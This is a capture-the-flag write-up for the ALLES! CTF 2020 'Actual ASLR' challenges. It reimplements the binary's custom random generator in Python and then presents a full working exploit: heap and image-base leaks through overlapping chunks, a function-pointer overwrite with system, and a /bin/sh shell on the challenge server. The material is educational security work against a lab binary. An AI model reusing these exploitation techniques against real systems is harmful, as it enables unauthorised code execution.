ALLES! CTF 2020 – Actual ASLR 1/2

The ALLES! CTF (ctftime.org) took place from 04/09/2020, 16:00 UTC to 06/09/2020, 19:00 UTC with a variety of interesting, creative challenges.

Within this article I want to share my writeup on the two challenges Actual ASLR 1 and 2, which were authored by LiveOverflow. What I especially liked about the challenge(s) is that you could make progression step by step even getting a first flag on the way to a full shell, which grants access to the second flag.

The article is divided into the following sections:

Actual ASLR 1
    – Binary
    – Random Algorithm
    – Reimplementation In Python
    – First Flag

Actual ASLR 2
    – Custom Heap
    – Vulnerability
    – Heap Leak
    – Image Base Leak
    – Overwriting Function Pointer
    – Final Exploit


Actual ASLR 1

Binary

The provided zip archive for both challenges is the same. The challenges differ in the goal we have to achieve. The zip archive contains a Dockerfile, ynetd, both flags and the actual binary called aaslr:

kali@kali:~/ctf/alles20/aaslr$ unzip aaslr.zip
Archive:  aaslr.zip
  inflating: aaslr
  inflating: Dockerfile
 extracting: flag1
 extracting: flag2
  inflating: ynetd

The binary is a dynamically linked 64 bit ELF file with all protections enabled:

kali@kali:~/ctf/alles20/aaslr$ file aaslr
aaslr: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1caebb4c4c5b9bb141671f3721daaabd26f49312, for GNU/Linux 3.2.0, not stripped
kali@kali:~/ctf/alles20/aaslr$ checksec aaslr
[*] '/home/kali/ctf/alles20/aaslr/aaslr'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

When running the binary a menu with 4 options is displayed:

kali@kali:~/ctf/alles20/aaslr$ ./aaslr
Welcome To The Actual-ASLR (AASLR) Demo
  1. throw dice
  2. create entry
  3. read entry
  4. take a guess

Select menu Item:

The first option 1. throw dice simply generates a random number between 1 and 6:

...
Select menu Item:
1
[>] Threw dice: 3
...
Select menu Item:
1
[>] Threw dice: 4
...

The second option 2. create entry allows us to enter some data:

...
Select menu Item:
2
Enter your data (max length: 100):
AAAAAAAAAAAAA
[>] Created new entry at index 0
...

With the third option 3. read entry we can read this data:

...
Select menu Item:
3
Enter entry index (max: 0):
0
[>] 0. AAAAAAAAAAAAA
...

When selecting the fourth option 4. take a guess we have to guess the subsequent 15 dice rolls:

Select menu Item:
4
(1/16) guess next dice roll:
1
(2/16) guess next dice roll:
2
...
(14/16) guess next dice roll:
2
(15/16) guess next dice roll:
3
[!] WRONG!

A quick look at the decompilation of the related function take_guess in ghidra reveals that we have to make all 15 guesses correct in order to retrieve the first flag (which is actually called flag2):

Random Algorithm

In order to make the correct guesses, we have to understand how the random numbers are generated.

Within the main function, we can see that a custom function called aaslr_malloc is obviously used to allocate memory:

This function initializes a custom heap on the first allocation:

We will get to the actual allocation when solving the second challenge.

The init_heap function uses mmap in order to allocate 0x10000 bytes for the custom heap. After this time is called, which retrieves the seconds past since January 1, 1970. This value is passed to the raninit function:

raninit is the initialization function for the custom random generator. The generator uses four qwords (8 byte) stored in RANCTX. The first qword is initialized with the static value 0xf1ea5eed. The other three qwords are initialized with the value passed (seconds returned from the call to time). After this the function ranval is called 0x14(=20) times:

The function ranval performs some mathematical operations on the qwords stored in RANCTX and finally returns the actual random number (qword):

At last we have to take a look at the throw_dice function, which is used in take_guess in order to determine the outcome of a dice roll. Not very surprisingly the function uses ranval in order to generate a random value in the range from 1 to 6:

Reimplementation In Python

After we have comprehended how the random numbers are generated, we can reimplement the algorithm in python in order to automatically make the correct guesses. (At first I solved the challenge by simply piping 4 (take a guess) and the output of the first 15 rolls from the local execution of binary to the challenge server. This is sufficient, if the local machine’s time is adjusted to the server’s time. Though the python reimplementation will come in handy especially in the second challenge.)

For the python reimplementation we can basically transcribe the decompiled C code into python. Just a few notable remarks here:

  • In order to get the seconds since January 1, 1970 we could use a corresponding python function. Though I stuck to the native C function using ctypes just to be sure.
  • The mathematical operations performed within the ranval function are carried out on qwords. The variables in python are not limited to a qword, thus we have to enforce this limitation by applying the mask 0xffffffffffffffff to all operations, which potentially exceed the 8 byte qword bounds.
  • We must take into consideration that the two calls to aaslr_malloc within the main function of the binary trigger a call to ranval each.
#!/usr/bin/env python3

import ctypes

RANCTX = [0,0,0,0]

def init_heap():
  libc = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
  n = libc.time(0)
  raninit(n)

def raninit(n):
  global RANCTX
  RANCTX[0] = 0xf1ea5eed
  RANCTX[1] = n
  RANCTX[2] = n
  RANCTX[3] = n
  i = 0
  while (i < 0x14):
    ranval()
    i += 1

def ranval():
  mask = 0xffffffffffffffff
  a = (RANCTX[0] - (((RANCTX[1]>>5) | (RANCTX[1]<<0x1b)) & mask) & mask)
  RANCTX[0] = (RANCTX[1] ^ ((RANCTX[2]>>0xf) | (RANCTX[2]<<0x11))) & mask
  b = (RANCTX[0] + a) & mask
  RANCTX[1] = (RANCTX[2] + RANCTX[3]) & mask
  RANCTX[2] = (RANCTX[3] + a) & mask
  RANCTX[3] = b
  return b

def throw_dice():
  return (ranval()%6)+1

init_heap()
ranval() # aaslr_malloc(8)
ranval() # aaslr_malloc(0x7f8)
for i in range(10): print(throw_dice())

Although a comparison of the 8 byte generated random numbers would be more precise, let’s quickly compare the first 10 rolls:

kali@kali:~/ctf/alles20/aaslr$ python3 -c 'print("1\n"*10)'|./aaslr|grep dice:|cut -d' ' -f4 > out1.txt; ./aaslr1.py > out2.txt
kali@kali:~/ctf/alles20/aaslr$ pr -m -t out1.txt out2.txt
4                                   4
4                                   4
5                                   5
3                                   3
5                                   5
6                                   6
4                                   4
2                                   2
3                                   3
5                                   5

Accordingly our python script should be fine.

First Flag

In order to solve the first challenge we only need a little adjustment:

...
print('4')
for i in range(0xf): print(throw_dice())

At first we are sending a 4, in order to select the menu option take a guess. After this we output the first 0xf = 15 dice rolls.

Before running the script make sure that your local machine’s time is correctly set. After verifying this we can simply pipe the output of the script to ncat:

kali@kali:~/ctf/alles20/aaslr$ ./aaslr1.py | ncat --ssl 7b0000008df55363d3b799a5.challenges.broker3.allesctf.net 1337
Welcome To The Actual-ASLR (AASLR) Demo
  1. throw dice
  2. create entry
  3. read entry
  4. take a guess

Select menu Item:
(1/16) guess next dice roll:
(2/16) guess next dice roll:
(3/16) guess next dice roll:
(4/16) guess next dice roll:
(5/16) guess next dice roll:
(6/16) guess next dice roll:
(7/16) guess next dice roll:
(8/16) guess next dice roll:
(9/16) guess next dice roll:
(10/16) guess next dice roll:
(11/16) guess next dice roll:
(12/16) guess next dice roll:
(13/16) guess next dice roll:
(14/16) guess next dice roll:
(15/16) guess next dice roll:
[>] CORRECT! You should go to Vegas.
ALLES{ILLEGAL_CARD_COUNTING!_BANNED}

The first flag is ALLES{ILLEGAL_CARD_COUNTING!_BANNED}.

Actual ASLR 2

Custom Heap

The goal of the second challenge is to actually exploit the binary. Thus it’s time to take a deeper look at the custom heap implementation.

We have already seen that the custom heap is initialized by allocating 0x10000 bytes using mmap:

The function used to allocate chunks within the heap is called aaslr_malloc. This function calls ranval in order to retrieve a random offset within the 0x10000 bytes. The modulo operand 0x10000 is subtracted by the amount of bytes requested in order to serve a memory chunk sufficiently large enough:

Within the main function there are already two allocations. The memory of the first one is used to store pointers of the functions corresponding the menu options (8 bytes are allocated here, though I guess it should have been 8*5 = 40, since 5 function pointers are being stored here). The secondly allocated chunk (0x7f8 byte) is used to store pointers for subsequent allocations to the custom heap in order to store the data, which can be entered by the user:

So basically the custom heap looks like this after the first two allocations:

Please notice that the allocated chunks are not aligned to any boundary. Thus the address of the first chunk could be ...ef and the second ...05.

Using the option 2. create entry we can create additional chunks. This is done within the function create_entry, which allocates 100 bytes and stores the pointer at an incrementing index within ENTRY. After this read_input is called, which simply reads n bytes from stdin and replaces the closing newline with a null byte. After the data is read, it is moved qword by qword to the allocated chunk:

After creating two additional entries the heap might look like this:

Vulnerability

After we have identified how the custom heap is working we still need a vulnerability, in order to exploit the binary. In this case the vulnerability is quite obvious. The custom heap lacks any form of allocation tracking. Because of this it could possibly happen, that subsequent allocations overlap each other:

If we would manage to retrieve a chunk, which overlaps with the function pointers, we could gain code execution. With the error_case function the main loop already contains a perfect candidate, we should aim at overwriting. If an invalid menu option is entered, this function is called with the first parameter being the invalid string entered:

If we overwrite the function pointer with system and enter /bin/sh in the main menu, system("/bin/sh") is executed and we gain a shell.

Retrieving the offset of the function pointers within the custom heap is no problem. Since we have already proven with the first challenge, that we can produce the same random numbers as the server, we can also predict the offset of each allocated chunk within the custom heap. What actually is a problem here, is the ASLR performed by the kernel. The binary is compiled with PIE, which means that we don’t know the image base address including the absolute address of the functions.

My first hope was that a partial overwrite could help. Though at a second glance this did not seem to be a promising approach, since the data read is moved qword-by-qword and (even more bad) terminated with a null byte. Accordingly we need to a leak.

Heap Leak

In order to read data the menu option 3. read entry can be used, which triggers the read_entry function. This function reads an integer, which is used as an index into ENTRY. The address stored at this index is printed as a string:

Please notice that there are no boundary checks on the entered index. Thus we can also reference pointers outside of ENTRY.

Since the read_entry function uses a %s format specifier to print the data, a null byte terminates the output. Because a null byte is added after the data we enter, we cannot simply allocate a chunk before a pointer and leak it. Instead we can allocate a chunk, which overlaps with an entry in ENTRY array. If we then allocate enough chunks until the referenced entry is populated with the corresponding pointer, we can simply leak it:

Let’s adjust our python script accordingly. At first we should add a few functions, which ease the use of the menu options:

...
def throw_dice():
  io.sendline('1')
  io.recvuntil('Item:')

def create_entry(data):
  io.sendline('2')
  io.sendlineafter('100):', data)
  io.recvuntil('Item:')

def read_entry(idx):
  io.sendline('3')
  io.sendlineafter('):', str(idx))
  r = io.recvuntil('\nWelcome')[:-8]
  io.recvuntil('Item:')
  return r.split(b'. ')[1]
...

Also we add the aaslr_malloc function, in order to be able to predict the offset of an allocated chunk:

...
def aaslr_malloc(n):
  return ranval() % (0x10000 - n)
...

At the beginning we add the steps to initialize the random generator (formerly contained in init_heap):

...
libc = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
n = libc.time(0)
raninit(n)
...

Using our aaslr_malloc function we can determine the offset of both allocations initially made: the function pointers as well as the ENTRY pointer array:

...
fcn_ptrs = aaslr_malloc(8)
print('fcn_ptrs: ' + hex(fcn_ptrs))
entry    = aaslr_malloc(0x7f8)
print('entry   : ' + hex(entry))
...

Now comes the more tricky part. We want to get a chunk, which overlaps with an entry within the ENTRY array. Using our aaslr_malloc function we can predict the offset of an allocated chunk before actually making the allocation in the target binary. If the local execution of aaslr_malloc returns an offset, which does not suffice our needs, we just proceed until we find a suitable offset. Since the amount of allocations in the target binary are limited, we can simply trigger throw_dice instead of making an allocation. throw_dice calls ranval, which proceeds the state of the random generator to the next iteration.

The offset we want to find doesn’t only need to overlap with an entry, but should also be 8 byte aligned with ENTRY (this way the offset exactly references one entry). This means that the 3 least significant bits should be equal. Now we only have to count the amount of allocations / random generator iterations, which are required to get the desired offset:

...
num_allocs = 0
addr = 0
while True:
  addr = aaslr_malloc(100)
  if (addr >= entry+8 and addr <= entry+8+0x200 and ((addr&7) == (entry&7))):
    print('got in on alloc '+str(num_allocs))
    break
  num_allocs += 1
...

After having determined the amount we run the target binary and throw the dice num_allocs times. The next allocation made with create_entry retrieves the desired offset/address:

...
io = process('./aaslr')
io.recvuntil('Item:')
for i in range(num_allocs): throw_dice()
create_entry('') # this allocation overlaps with an entry
...

At next we make enough allocation in order to populate a pointer to the returned address:

...
ptr_leak = 0
for i in range(int((addr-entry+8)/8)-1):
  create_entry('')
  ptr_leak = aaslr_malloc(100)
...

Now we can leak the absolute address of the last allocation through index 0:

...
p = int.from_bytes(read_entry(0), 'little')
heap_base = p-ptr_leak
print('heap_base: ' + hex(heap_base))
...

Running the script yields the custom heap base address:

...
fcn_ptrs: 0xd867
entry   : 0x8a63
got in on alloc 38
[+] Starting local process './aaslr': pid 2334
heap_base: 0x7fa08918c000

Image Base Leak

Since we are now able to determine the absolute address of allocated chunks, we can use this in order to leak one of the function pointers, which in turn yields the base address of the image.

The absolute address of the function pointers can simply be calculated by adding the offset we determined locally to the heap base address:

...
addr_fcn_ptrs = heap_base + fcn_ptrs
print('addr_fcn_ptrs: ' + hex(addr_fcn_ptrs))
...

In order to leak the content of this address, we need to allocate a chunk, which is 8 byte aligned to ENTRY. This way we can reference this chunk with the corresponding index. Remember that read_entry doesn’t perform any boundary checks on the entered index, even negative indices are possible (if required to reference our chunk):

Again we count the required allocations / iterations in order to get the desired offset:

...
num_allocs = 0
ptr_leak = 0
while True:
  ptr_leak = aaslr_malloc(100)
  if ((ptr_leak&7) == (entry&7)):
    print('got it on alloc ' +str(num_allocs))
    break
  num_allocs += 1
...

After the amount is determined, we throw the dice num_allocs times and then make the actual allocation. For the data we enter the absolute address of the function pointers:

...
for i in range(num_allocs): throw_dice()
create_entry(p64(addr_fcn_ptrs))
...

Now we can use the corresponding index in order to read from the previously allocated chunk. The result is the address of the first function pointer (throw_dice). By subtracting the offset of the function, we gain the image base address:

...
p = int.from_bytes(read_entry(int((addr-entry)/8)), 'little')
img_base = p-0x00001584
print('img_base: ' + hex(img_base))
...

Running the adjusted script additionally yields the image base address:

...
addr_fcn_ptrs: 0x7fef2fd73c66
got it on alloc 14
img_base: 0x560bb6a3d000

Overwriting Function Pointer

At this point we have everything we need, in order to overwrite the function pointer of error_case. So let’s again use the same technique we used before in order to allocate a chunk, which overlaps with the function pointer of error_case:

...
num_allocs = 0
while True:
  addr = aaslr_malloc(100)
  if (addr > fcn_ptrs+40-100 and addr < fcn_ptrs+32):
    print('got it on alloc '+str(num_allocs))
    break
  else: num_allocs += 1
for i in range(num_allocs): throw_dice()
...

Since system is used by the binary itself (to cat the first flag), we don’t need the absolute address of it. Instead we can just use the PLT entry, which is relative to the image base address, we already know:

...
addr_system = img_base + 0x00001070
...

Finally we can overwrite the function pointer:

...
create_entry(b'A'*(fcn_ptrs-addr+32)+p64(addr_system))
...

If we now enter "/bin/sh" in the main menu, system("/bin/sh") is executed:

...
io.sendline('/bin/sh')
io.interactive()

Final Exploit

In the final exploit script I added a few performance checks. If the desired offset requires too much allocations, we just proceed to the next second (or start over again, if this happens later in the script). This way we can precalculate a suitable time, at which we should execute the exploit and thus decrease the load on the server and prevent hitting the signal timeout.

The final script looks like this:

#!/usr/bin/env python3

import ctypes
import time
from pwn import *

RANCTX = [0,0,0,0]

def raninit(n):
  global RANCTX
  RANCTX[0] = 0xf1ea5eed
  RANCTX[1] = n
  RANCTX[2] = n
  RANCTX[3] = n
  i = 0
  while (i < 0x14):
    ranval()
    i += 1

def ranval():
  mask = 0xffffffffffffffff
  a = (RANCTX[0] - (((RANCTX[1]>>5) | (RANCTX[1]<<0x1b)) & mask) & mask)
  RANCTX[0] = (RANCTX[1] ^ ((RANCTX[2]>>0xf) | (RANCTX[2]<<0x11))) & mask
  b = (RANCTX[0] + a) & mask
  RANCTX[1] = (RANCTX[2] + RANCTX[3]) & mask
  RANCTX[2] = (RANCTX[3] + a) & mask
  RANCTX[3] = b
  return b

def create_entry(data):
  io.sendline('2')
  io.sendlineafter('100):', data)
  io.recvuntil('Item:')

def read_entry(idx):
  io.sendline('3')
  io.sendlineafter('):', str(idx))
  r = io.recvuntil('\nWelcome')[:-8]
  io.recvuntil('Item:')
  return r.split(b'. ')[1]
def throw_dice():
  io.sendline('1')
  io.recvuntil('Item:')

def aaslr_malloc(n):
  return ranval() % (0x10000 - n)


libc = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
n = libc.time(0)

while True:
  # ---------------------------------
  # LOCAL CALCULATION
  # --> determine time, which produces suitable values

  raninit(n)
  fcn_ptrs = aaslr_malloc(8)
  print('fcn_ptrs: ' + hex(fcn_ptrs))
  entry    = aaslr_malloc(0x7f8)
  print('entry   : ' + hex(entry))

  # at first we want to leak a heap address
  # in order to do this we need to create a chunk, which overlapps with entry
  num_allocs = 0
  addr = 0
  while True:
    addr = aaslr_malloc(100)
    if (addr >= entry+8 and addr <= entry+8+0x200 and ((addr&7) == (entry&7))):
      print('got in on alloc '+str(num_allocs))
      break
    num_allocs += 1
  if (num_allocs > 100):
    n += 1
    continue

  log.warning('continuing ...')
  time_now = libc.time(0)
  log.warning('sleeping for '+str(n-time_now)+' seconds')
  time.sleep(n-time_now)
  # ---------------------------------
  # ACTUALLY ESTABLISH CONNECTION
  io = remote('localhost', 1337)
  io.recvuntil('Item:')

  for i in range(num_allocs): throw_dice()

  create_entry('') # this allocation overlaps with ENTRY
  ptr_leak = 0
  for i in range(int((addr-entry+8)/8)-1):
    create_entry('Y')
    ptr_leak = aaslr_malloc(100)

  # now we can leak a heap address through idx 0
  p = int.from_bytes(read_entry(0), 'little')
  heap_base = p-ptr_leak
  print('heap_base: ' + hex(heap_base))

  # now we can determine the address where the fcn_ptrs are stored
  addr_fcn_ptrs = heap_base + fcn_ptrs
  print('addr_fcn_ptrs: ' + hex(addr_fcn_ptrs))

  # in order to leak the address we create a chunk, which address them and is aligned with the ENTRY
  num_allocs = 0
  ptr_leak = 0
  while True:
    ptr_leak = aaslr_malloc(100)
    if ((ptr_leak&7) == (entry&7)):
      print('got it on alloc ' +str(num_allocs))
      break
    num_allocs += 1

  addr = ptr_leak
  print('entry at ' + hex(heap_base+entry))
  print('addr at  ' + hex(heap_base+addr))
  print('index = ' + str(int((addr-entry)/8)))
  for i in range(num_allocs): throw_dice()
  create_entry(p64(addr_fcn_ptrs))
  p = int.from_bytes(read_entry(int((addr-entry)/8)), 'little')
  img_base = p-0x00001584
  print('img_base: ' + hex(img_base))

  # now lets find a chunk before the error_case fcn_ptr
  num_allocs = 0
  while True:
    addr = aaslr_malloc(100)
    if (addr > fcn_ptrs+40-100 and addr < fcn_ptrs+32):
      print('got it on alloc '+str(num_allocs))
      break
    else: num_allocs += 1
  if (num_allocs > 400):
    io.close()
    n = libc.time(0)
    continue
  log.warning('continuing ...')

  for i in range(num_allocs): throw_dice()
  addr_system = img_base + 0x00001070
  create_entry(b'A'*(fcn_ptrs-addr+32)+p64(addr_system))
  log.warning('trying to spawn /bin/sh')
  io.sendline('/bin/sh')
  io.interactive()
  quit()

Directly connecting to the CTF server (SSL) from pwntools did not work for some reason (even when providing ssl=True). Instead of digging deeper into the issue, I simply used ncat to unwrap SSL:

kali@kali:~/ctf/alles20/aaslr$ while true; do ncat -l localhost 1337 --sh-exec 'ncat --ssl 7b00000033cee663d117bcd3.challenges.broker4.allesctf.net 1337'; done

This way we can simply connect to localhost:1337 (unencrypted).

Running the final script yields a shell:

kali@kali:~/ctf/alles20/aaslr$ ./final.py
fcn_ptrs: 0x4617
entry   : 0x33af
got in on alloc 351
...
fcn_ptrs: 0xfc66
entry   : 0xbd19
got in on alloc 51
[!] continuing ...
[!] sleeping for 5 seconds
[+] Opening connection to localhost on port 1337: Done
heap_base: 0x7fef2fd64000
addr_fcn_ptrs: 0x7fef2fd73c66
got it on alloc 14
entry at 0x7fef2fd6fd19
addr at  0x7fef2fd64261
index = -5975
img_base: 0x560bb6a3d000
got it on alloc 232
[!] continuing ...
[!] trying to spawn /bin/sh
[*] Switching to interactive mode

$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls -al
total 60
drwxr-xr-x. 2 root root   109 Sep  3 15:32 .
drwxr-xr-x. 3 root root    17 Sep  3 15:32 ..
-rw-r--r--. 1 root root   220 Apr  4  2019 .bash_logout
-rw-r--r--. 1 root root  3771 Apr  4  2019 .bashrc
-rw-r--r--. 1 root root   807 Apr  4  2019 .profile
-rwxr-xr-x. 1 root root 17872 Jul 22 18:50 aaslr
-rw-r--r--. 1 root root    55 Aug 14 16:52 flag1
-rw-r--r--. 1 root root    37 Aug 14 16:52 flag2
-rwxr-xr-x. 1 root root 18744 Jul 22 18:50 ynetd
$ cat flag1
ALLES{Well...More_memory_would_make_it_S3CURE!RIGHT?!}

The second flag is ALLES{Well...More_memory_would_make_it_S3CURE!RIGHT?!}.